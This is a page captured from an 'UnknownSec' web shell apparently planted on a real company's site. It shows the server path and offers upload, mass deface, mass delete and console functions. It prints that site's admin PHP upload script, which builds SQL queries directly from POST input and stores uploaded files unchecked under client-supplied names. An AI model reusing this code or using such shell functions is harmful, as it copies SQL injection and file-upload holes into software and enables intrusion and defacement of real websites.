shell bypass 403

UnknownSec Shell

: /home/interiorvi/domains/interiorvisions.co.th/public_html/admin/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : update_setting_images4.php
<?php 
include('../config/config.php');

$q            = $_POST['q'];
$pro_name     = $_POST['pro_name'];
$text_image1     = $_POST['text_image1'];
$text_image2     = $_POST['text_image2'];

$sql = "SELECT * FROM projects WHERE p_id = ".$q." ";
$res = $conn->query($sql);
while($row = $res->fetch_assoc()){
    $im_show = $row['p_im_show'];
    $check_path = substr($im_show,7,32);
}
if(isset($_FILES['file1']['tmp_name'])){
    $sql1 = "SELECT * FROM project_details WHERE pd_no = 1   and p_pd_id = ".$q."";
    $res1 = $conn->query($sql1);
    while($row1 = $res1->fetch_assoc()){
            $test = substr($row1['im_pd_id'],0,6);
            if($test == "upload"){
                $oldPicture = "../".$row1['im_pd_id'];
                if (file_exists($oldPicture)) {
                        unlink($oldPicture);
                } 
            }
            $images = $_FILES['file1']['tmp_name'];
            $images_name = $_FILES['file1']['name'];
            $upload_path = $check_path;
            $images1 = "upload/".$upload_path."/".md5($date_current.$_FILES['file1']['size'].rand(1,1000000).time()).$images_name;
            move_uploaded_file($_FILES['file1']['tmp_name'],"../".$images1);
            $sql = "UPDATE project_details SET im_pd_id = '".$images1."', pd_text = '".$text_image1."' WHERE pd_no = 1 and p_pd_id = ".$q."";
            $res = $conn->query($sql);
            if($res == TRUE){   
                $check_1 = true;
            }
    }
}else if(isset($text_image1)){
    $sql = "UPDATE project_details SET pd_text = '".$text_image1."' WHERE pd_no = 1 and p_pd_id = ".$q."";
    $res = $conn->query($sql);
    if($res == TRUE){   
        $check_1 = true;
    }
}else{
    $check_1 = TRUE;
}

if(isset($_FILES['file2']['tmp_name'])){
    $sql2 = "SELECT * FROM project_details WHERE pd_no = 2 and p_pd_id = ".$q."";
    $res2 = $conn->query($sql2);
    while($row2 = $res2->fetch_assoc()){
            $test = substr($row2['im_pd_id'],0,6);
            if($test == "upload"){
                $oldPicture = "../".$row2['im_pd_id'];
                if (file_exists($oldPicture)) {
                        unlink($oldPicture);
                } 
            }
            $images = $_FILES['file2']['tmp_name'];
            $images_name = $_FILES['file2']['name'];
            $upload_path = $check_path;
            $images2 = "upload/".$upload_path."/".md5($date_current.$_FILES['file2']['size'].rand(1,1000000).time()).$images_name;
            move_uploaded_file($_FILES['file2']['tmp_name'],"../".$images2);
            $sql = "UPDATE project_details SET im_pd_id = '".$images2."' , pd_text = '".$text_image2."' WHERE pd_no = 2 and p_pd_id = ".$q." ";
            $res = $conn->query($sql);
            if($res == TRUE){   
                $check_2 = true;
            }
    }
}else if(isset($text_image2)){
    $sql = "UPDATE project_details SET pd_text = '".$text_image2."' WHERE pd_no = 2 and p_pd_id = ".$q."";
    $res = $conn->query($sql);
    if($res == TRUE){   
        $check_2 = true;
    }
}else{
    $check_2 = TRUE;
}





    if(($check_1 === true) and ($check_2 === true)){
        echo 1;
    }else{
        echo 0;
    }

?>

© 2024 UnknownSec